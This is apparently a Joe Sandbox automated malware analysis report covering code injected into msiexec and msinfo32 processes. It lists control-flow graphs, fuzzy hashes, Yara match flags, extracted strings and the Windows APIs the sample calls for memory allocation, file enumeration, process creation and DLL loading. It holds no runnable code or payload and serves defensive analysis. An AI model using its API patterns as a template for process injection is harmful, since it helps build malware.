                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c808dfc40b9e712deefb9aedea04c06f954e99aafec3f38bc55de228a13f22e
                                            • Instruction ID: 1ff273ad4fafa17cb0f2050c3b714e963c7933476c80778005cb1a14bfd8ebb8
                                            • Opcode Fuzzy Hash: 1c808dfc40b9e712deefb9aedea04c06f954e99aafec3f38bc55de228a13f22e
                                            • Instruction Fuzzy Hash: FF90026175541846D1407198845470700069BD0605F55C111B1025514D8656DAA966F2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be3c86ca17a1bd9c7f66fc67a468653d613861c71995ab0dda70c04577ecc3d0
                                            • Instruction ID: b68964346726e853b2cc8f139380970d42481051735fbcf45b761919b607eb6d
                                            • Opcode Fuzzy Hash: be3c86ca17a1bd9c7f66fc67a468653d613861c71995ab0dda70c04577ecc3d0
                                            • Instruction Fuzzy Hash: 9A9002A1B155108681407198484440660056BE1305395C215B1555520C8658D99992BA

                                            Control-flow Graph

                                            control_flow_graph 124 24887630-24887651 125 2488768b-24887699 call 24894c30 124->125 126 24887653-2488766f call 2485e660 124->126 131 248c4638 126->131 132 24887675-24887682 126->132 135 248c463f-248c4645 131->135 133 2488769a-248876a9 call 24887818 132->133 134 24887684 132->134 140 248876ab-248876c1 call 248877cd 133->140 141 24887701-2488770a 133->141 134->125 137 248c464b-248c46b8 call 248df290 call 24899020 BaseQueryModuleData 135->137 138 248876c7-248876d0 call 24887728 135->138 137->138 161 248c46be-248c46c6 137->161 138->141 149 248876d2 138->149 140->135 140->138 147 248876d8-248876e1 141->147 151 2488770c-2488770e 147->151 152 248876e3-248876f2 call 2488771b 147->152 149->147 153 248876f4-248876f6 151->153 152->153 157 248876f8-248876fa 153->157 158 24887710-24887719 153->158 157->134 160 248876fc 157->160 158->157 162 248c47be-248c47d0 call 24892c50 160->162 161->138 164 248c46cc-248c46d3 161->164 162->134 164->138 166 248c46d9-248c46e4 164->166 167 248c47b9 call 24894d48 166->167 168 248c46ea-248c4723 call 248df290 call 2489aaa0 166->168 167->162 174 248c473b-248c476b call 248df290 168->174 175 248c4725-248c4736 call 248df290 168->175 174->138 180 248c4771-248c477f call 2489a770 174->180 175->141 183 248c4786-248c47a3 call 248df290 call 248ccf9e 180->183 184 248c4781-248c4783 180->184 183->138 189 248c47a9-248c47b2 183->189 184->183 189->180 190 248c47b4 189->190 190->138
                                            Strings
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 248C4787
                                            • Execute=1, xrefs: 248C4713
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 248C46FC
                                            • ExecuteOptions, xrefs: 248C46A0
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 248C4655
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 248C4725
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 248C4742
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: fcd4fdab6d25c3fb32e5a31a734441eec2ee027ee9c6f44148f8b1943a95561f
                                            • Instruction ID: 00cd8806466a1db8647cd5c95536ce95398306e6dc8235daf57e0555f181ef1b
                                            • Opcode Fuzzy Hash: fcd4fdab6d25c3fb32e5a31a734441eec2ee027ee9c6f44148f8b1943a95561f
                                            • Instruction Fuzzy Hash: 0251273162061DFBEB11EBA8DC95FA97BB8EF14700F0403A9E605A7281EB709A45CF50

                                            Control-flow Graph

                                            control_flow_graph 387 2489b5ec-2489b5fc 388 2489b5fe 387->388 389 2489b600-2489b602 387->389 388->389 390 2489b608-2489b60d 389->390 391 2489b830-2489b844 call 24894b87 389->391 392 2489b60f-2489b612 390->392 393 2489b621-2489b62e 390->393 392->391 395 2489b618-2489b61b 392->395 396 2489b631-2489b63d call 2489b5e6 393->396 395->391 395->393 400 2489b64a-2489b653 396->400 401 2489b63f-2489b644 396->401 403 2489b65a-2489b65d 400->403 404 2489b655-2489b658 400->404 401->401 402 2489b646-2489b648 401->402 402->396 405 2489b65f-2489b662 403->405 406 2489b665-2489b66d 403->406 404->405 405->406 407 2489b66f-2489b672 406->407 408 2489b690-2489b693 406->408 409 2489b67c-2489b680 407->409 410 2489b674 407->410 411 2489b6ad-2489b6d4 __aulldvrm 408->411 412 2489b695-2489b698 408->412 414 2489b68a-2489b68d 409->414 415 2489b682-2489b684 409->415 413 2489b676-2489b67a 410->413 417 2489b6d7-2489b6e9 call 2489b5e6 411->417 412->411 416 2489b69a-2489b69e 412->416 413->411 414->408 415->414 418 2489b686-2489b688 415->418 419 2489b6a0-2489b6a2 416->419 420 2489b6a4-2489b6aa 416->420 423 2489b6eb-2489b6f1 417->423 424 2489b6f3-2489b704 call 2489b5e6 417->424 418->413 419->411 419->420 420->411 425 2489b71b-2489b727 423->425 430 2489b70a-2489b713 424->430 431 2489b791-2489b794 424->431 428 2489b729-2489b735 425->428 429 2489b797 425->429 432 2489b737 428->432 433 2489b766-2489b769 428->433 434 2489b79a-2489b79e 429->434 436 2489b718 430->436 437 2489b715 430->437 431->429 438 2489b739-2489b73c 432->438 439 2489b73e-2489b741 432->439 435 2489b76c-2489b786 call 24896580 433->435 440 2489b7ad-2489b7b0 434->440 441 2489b7a0-2489b7a2 434->441 461 2489b789-2489b78c 435->461 436->425 437->436 438->433 438->439 445 2489b743-2489b746 439->445 446 2489b757-2489b762 439->446 447 2489b7df-2489b7ed call 248dd8b0 440->447 448 2489b7b2-2489b7b5 440->448 443 2489b7a4 441->443 444 2489b7a7-2489b7ab 441->444 443->444 454 2489b815-2489b81a 444->454 445->446 455 2489b748-2489b74e 445->455 446->434 451 2489b764 446->451 469 2489b7ef-2489b7f5 447->469 470 2489b7f7-2489b7fa 447->470 449 2489b80f 448->449 450 2489b7b7-2489b7ba 448->450 456 2489b812 449->456 457 2489b7bc-2489b7c1 450->457 458 2489b7ce-2489b7d3 450->458 451->461 459 2489b81c 454->459 460 2489b81e-2489b821 454->460 455->435 463 2489b750 455->463 456->454 457->447 465 2489b7c3-2489b7c6 457->465 458->449 468 2489b7d5 458->468 459->460 466 2489b829-2489b82f 460->466 467 2489b823-2489b827 460->467 461->417 463->446 464 2489b752-2489b755 463->464 464->435 464->446 465->456 471 2489b7c8-2489b7ca 465->471 467->466 468->447 472 2489b7d7-2489b7dd 468->472 469->454 473 2489b7fc-2489b803 470->473 474 2489b805-2489b80d 470->474 471->447 475 2489b7cc 471->475 472->447 472->456 473->454 474->454 475->456
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction ID: 0ade6b9de62d6012ebb6210b61af11bc8e6ab209a0c7ff9155975539b912abf5
                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction Fuzzy Hash: FC81C070E25A49EFDB068F68C891BEEBBF2BF45350F144759E851A7391C734A940CB50
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 248C728C
                                            Strings
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 248C7294
                                            • RTL: Resource at %p, xrefs: 248C72A3
                                            • RTL: Re-Waiting, xrefs: 248C72C1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: f7c6c812df91deb63b13ff4f90fc0ad0247e5cd715ed4f9782257bd0d15e15ad
                                            • Instruction ID: 6c2a877ceaa13f992f126864fd7f768fa607df2bea440bb9ce08ed74e4f1ee2e
                                            • Opcode Fuzzy Hash: f7c6c812df91deb63b13ff4f90fc0ad0247e5cd715ed4f9782257bd0d15e15ad
                                            • Instruction Fuzzy Hash: 5941D032721A4AEBD715CE25CC41F56BBA5FF94720F100719FA55AB240DB71E842CBD1

                                            Execution Graph

                                            Execution Coverage:2.7%
                                            Dynamic/Decrypted Code Coverage:4%
                                            Signature Coverage:2.1%
                                            Total number of Nodes:476
                                            Total number of Limit Nodes:79
                                            execution_graph (rendered graph omitted): functions in the 02EBxxxx and 04F0xxxx address ranges. APIs reached from the graph: NtAllocateVirtualMemory, NtCreateFile, NtReadFile, NtDeleteFile, NtClose, RtlAllocateHeap, RtlFreeHeap, LdrLoadDll, CreateProcessInternalW, CreateThread, PostThreadMessageW, SetErrorMode, CoInitialize, CoUninitialize, GetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, Sleep. Every call into the 04F02xxx-04F04xxx stubs is labelled LdrInitializeThunk.

                                            Control-flow Graph

                                            control_flow_graph (rendered graph omitted): function at 2eb99f0, basic blocks 2eb99f0-2eba405; calls 2edab00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: '$s$#t$$$(w$)L$+]$,$-$-e(w$1C$3$3#$3S$4$6|$7$?p$@D$I=$LC$Q$UF$Y$[$_$e$k$n$o$pu$v$~$~[
                                            • API String ID: 0-1767221313
                                            • Opcode ID: e8f8583ca15bf8dec11a5e6b2359d4027345c531c0dcc552d072a290ebff84dc
                                            • Instruction ID: 43f37d0e9b1b7a18a40374c5b71654b063eb734c30dd07cb0155cb7e8e91c28f
                                            • Opcode Fuzzy Hash: e8f8583ca15bf8dec11a5e6b2359d4027345c531c0dcc552d072a290ebff84dc
                                            • Instruction Fuzzy Hash: 41429BB0D45229CBEB25CF44CA98BEEBBB2BF45308F1091D9D5096B382C7B55A85CF41
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 02ECC1F4
                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 02ECC22F
                                            • FindClose.KERNELBASE(?), ref: 02ECC23A
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNext
                                            • String ID:
                                            • API String ID: 3541575487-0
                                            • Opcode ID: ae1f5de46b7d885081abe0b275a01cf9b1fd9cd511b6b8782dc6db442755ffb0
                                            • Instruction ID: aed374d0772cd1fafe8bded7a497ac3518a241c818630e4af9d14d3f3cd22d9d
                                            • Opcode Fuzzy Hash: ae1f5de46b7d885081abe0b275a01cf9b1fd9cd511b6b8782dc6db442755ffb0
                                            • Instruction Fuzzy Hash: 3731A4759406086BDB20DBE0CC85FFF777C9B44718F24949DB50CAA180E670AA468BA0
                                            APIs
                                            • NtCreateFile.NTDLL(?,?,?,?,F4BE8C80,?,?,?,?,?,?), ref: 02ED8C11
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 26b38ecf28873711e68fba4d616ace3b5c5e70e1f3e7d97999a64b3286dc2217
                                            • Instruction ID: 17be1ade0eea6a7ab8c140f8e7ade55d2aff6c73ed827b3fb7522dcbb520727a
                                            • Opcode Fuzzy Hash: 26b38ecf28873711e68fba4d616ace3b5c5e70e1f3e7d97999a64b3286dc2217
                                            • Instruction Fuzzy Hash: 4331C5B5A41608AFCB14DF99D840EEEB7B9EF8C314F108219F918A7340D730A952CFA1
                                            APIs
                                            • NtReadFile.NTDLL(?,?,?,?,F4BE8C80,?,?,?,?), ref: 02ED8D66
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 3bfe58e093f50432aece3f42043520b97b06db6b7c52ec93a8443868dceddf28
                                            • Instruction ID: 2cfb27e87f023d1ac4519b750c6099e63bd2daa3478d476ba2c2c49b416a9d32
                                            • Opcode Fuzzy Hash: 3bfe58e093f50432aece3f42043520b97b06db6b7c52ec93a8443868dceddf28
                                            • Instruction Fuzzy Hash: 9F31C3B5A40248AFDB14DF99D880EEFB7B9EF88314F108119F919A7340D774A912CFA5
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(02EC18FB,?,02ED7A4F,00000000,F4BE8C80,00003000,?,?,?,?,?,02ED7A4F,02EC18FB), ref: 02ED9038
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 7a8860901ea27a2cf3111d9f556b42976b3706d4fa793628e101962242a4e2a7
                                            • Instruction ID: 19ee73ddff12d1978d2e121bb00695fd537696285328d7e3b0e18711ff9c6a96
                                            • Opcode Fuzzy Hash: 7a8860901ea27a2cf3111d9f556b42976b3706d4fa793628e101962242a4e2a7
                                            • Instruction Fuzzy Hash: 302117B5A40249ABDB14DF98DC41FEFB7BAEF88314F008119F918AB340D774A911CBA1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: da024b06ff85177f8ba737a894ca04aa6a05c97ed00ec557c2a9c459de66f5ee
                                            • Instruction ID: 22b5a650e4b972cc5d4e4ec1d994e3c01f62c66af44995781aeaa5f4ce8843e5
                                            • Opcode Fuzzy Hash: da024b06ff85177f8ba737a894ca04aa6a05c97ed00ec557c2a9c459de66f5ee
                                            • Instruction Fuzzy Hash: 7E117C71A81709BAD620EB95CC41FEBB3ADDF85314F408159F948AB280D775BA06CBB1
                                             APIs
                                             • NtClose.NTDLL(?,02EC2C83,001F0001,?,00000000,?,?,00000104), ref: 02ED8E47
                                             Memory Dump Source
                                             • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                             Yara matches
                                             Similarity
                                             • API ID: Close
                                             • String ID:
                                             • API String ID: 3535843008-0
                                             APIs
                                             Memory Dump Source
                                             • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                             Similarity
                                             • API ID: InitializeThunk
                                             • String ID:
                                             • API String ID: 2994545307-0
                                             • 18 further functions from the same dump (Source File 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Snapshot File hcaresult_13_2_4e90000_msinfo32.jbxd) carry the same API ID InitializeThunk and API String ID 2994545307-0, each with its own per-function opcode and instruction hashes.
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e152e6201cb68827220522f58d28e7a671042dcb98e9e286664f603a973044b4
                                            • Instruction ID: 4dc04144d1304d7a38a82761466b947f2a5e1c92504f87f4db851e11672b3230
                                            • Opcode Fuzzy Hash: e152e6201cb68827220522f58d28e7a671042dcb98e9e286664f603a973044b4
                                            • Instruction Fuzzy Hash: 7890026128240013610571588514616500A8BE1245B55C022E1015591DC625D9926126
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6dd45aabc5e748cd4d778d24de33ca21374721a37f999914845ea910b204003b
                                            • Instruction ID: 64566728a058605f1a4f09a185b34579940a5fc51f28bc5d21a33afd55265b59
                                            • Opcode Fuzzy Hash: 6dd45aabc5e748cd4d778d24de33ca21374721a37f999914845ea910b204003b
                                            • Instruction Fuzzy Hash: 1F90023168550413F1007158861470620058BD1245F65C412A0425569DC795DA5265A3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0a6e50d909a1b086750edd6a6bc2e15d7c2e5367649ac78053b84ec2ebda2965
                                            • Instruction ID: bff0bd554b7ae23038e07605df28b18763b93263b82f9deb85854c3cdc7ccb0b
                                            • Opcode Fuzzy Hash: 0a6e50d909a1b086750edd6a6bc2e15d7c2e5367649ac78053b84ec2ebda2965
                                            • Instruction Fuzzy Hash: 0D9002212C545113F150715C85046165005ABE1245F55C022A0815595DC655D9566222
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InitializeUninitialize
                                            • String ID: @J7<
                                            • API String ID: 3442037557-2016760708
                                            • Opcode ID: 87d0cb09610580fd4402b10bbdc2bd8cedcce99febf3232ab0f74cfbf26e2555
                                            • Instruction ID: ee5dc90a2fa5a505387b01aedfef44ea298da94bd37b3ac3d2e1f4f0a4767fcc
                                            • Opcode Fuzzy Hash: 87d0cb09610580fd4402b10bbdc2bd8cedcce99febf3232ab0f74cfbf26e2555
                                            • Instruction Fuzzy Hash: 934163B5A002099FDB10DFD8CC809EEB779FF49304F108559E905EB214D775AE46CBA1
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02ED35FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 3b3cd655dcb2b492e89b42c3d27b7a6b9966dfb7951a055d2cacefbf9c60d04e
                                            • Instruction ID: 34a82b9f33e38adff658a13030fc08fdb64aca9653ced8954766668474ac859b
                                            • Opcode Fuzzy Hash: 3b3cd655dcb2b492e89b42c3d27b7a6b9966dfb7951a055d2cacefbf9c60d04e
                                            • Instruction Fuzzy Hash: 9331BDB0A41605BBD714DFA4CC80FEBBBB9EB88714F04952DBA196B240D7706A41CFA1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InitializeUninitialize
                                            • String ID: @J7<
                                            • API String ID: 3442037557-2016760708
                                            • Opcode ID: a2686c6c4529f6f93a661288d3e8f26ac995cbdbee33669be1da804460d321b9
                                            • Instruction ID: 6963e35552e47a4b3f1099fe4d9370ad8b9c82a928bb5e1d4f2454b00c674001
                                            • Opcode Fuzzy Hash: a2686c6c4529f6f93a661288d3e8f26ac995cbdbee33669be1da804460d321b9
                                            • Instruction Fuzzy Hash: AB3152B6A006099FDB00DFD8C8819EFB7BABF88704B108559E915E7214D775EE06CBA0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02EC7EDC
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: cd54ed4095e9b31f6b64a27a4ce93c77ffc8641386dcd6915b95a27abc4d307f
                                            • Instruction ID: 99a3637b07316f576efeae59fc0b4a4dae862c527eeba5108f011ca0e8c0bc69
                                            • Opcode Fuzzy Hash: cd54ed4095e9b31f6b64a27a4ce93c77ffc8641386dcd6915b95a27abc4d307f
                                            • Instruction Fuzzy Hash: 4131BD365946814FE7259EB8CD827D47B6DEB02358F2CA2ACE865CB2C2D76084038AD0
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EC4122
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: a1ed677db0498e6de243f2045db78ee2bc9a6998461d9588c89e8df937842a96
                                            • Instruction ID: 521a6b837c62729819bcb660d82f86ef2a19fa9c56f55f6fbeab17fef0203ddd
                                            • Opcode Fuzzy Hash: a1ed677db0498e6de243f2045db78ee2bc9a6998461d9588c89e8df937842a96
                                            • Instruction Fuzzy Hash: DF31A976944206AFCB01DBB0D991BC9BB34AF52218F28D09DE84957283F231E607CBE1
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EC4122
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 8c653f4bef031480296291f3721b06dac10c38ba87bed496ed3b508604066595
                                            • Instruction ID: dfae5c122985a254e652d92436a55b8c659c3642eadd46b509671564a8c02645
                                            • Opcode Fuzzy Hash: 8c653f4bef031480296291f3721b06dac10c38ba87bed496ed3b508604066595
                                            • Instruction Fuzzy Hash: 0831AA336482459FCB06DF74D991BD9BF64EF96214F2C809DE8498B287E2329606C7E1
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EC4122
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: fa93d189cd74aa8ed59397b31af14a0738f4a82a17fd6a13deffbffab5015490
                                            • Instruction ID: 6ecf2097015a18184d9809dd7bf4d6918e3e04f7b112b52650c7c39b21b34920
                                            • Opcode Fuzzy Hash: fa93d189cd74aa8ed59397b31af14a0738f4a82a17fd6a13deffbffab5015490
                                            • Instruction Fuzzy Hash: C60152B5D8010DABDF10EBE4DD41FDEB3799B14308F1091A9A90897280F671EB15CB51
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,02EC7E6E,00000010,?,?,?,00000044,?,00000010,02EC7E6E,?,?,?), ref: 02ED9270
                                            Memory Dump Source
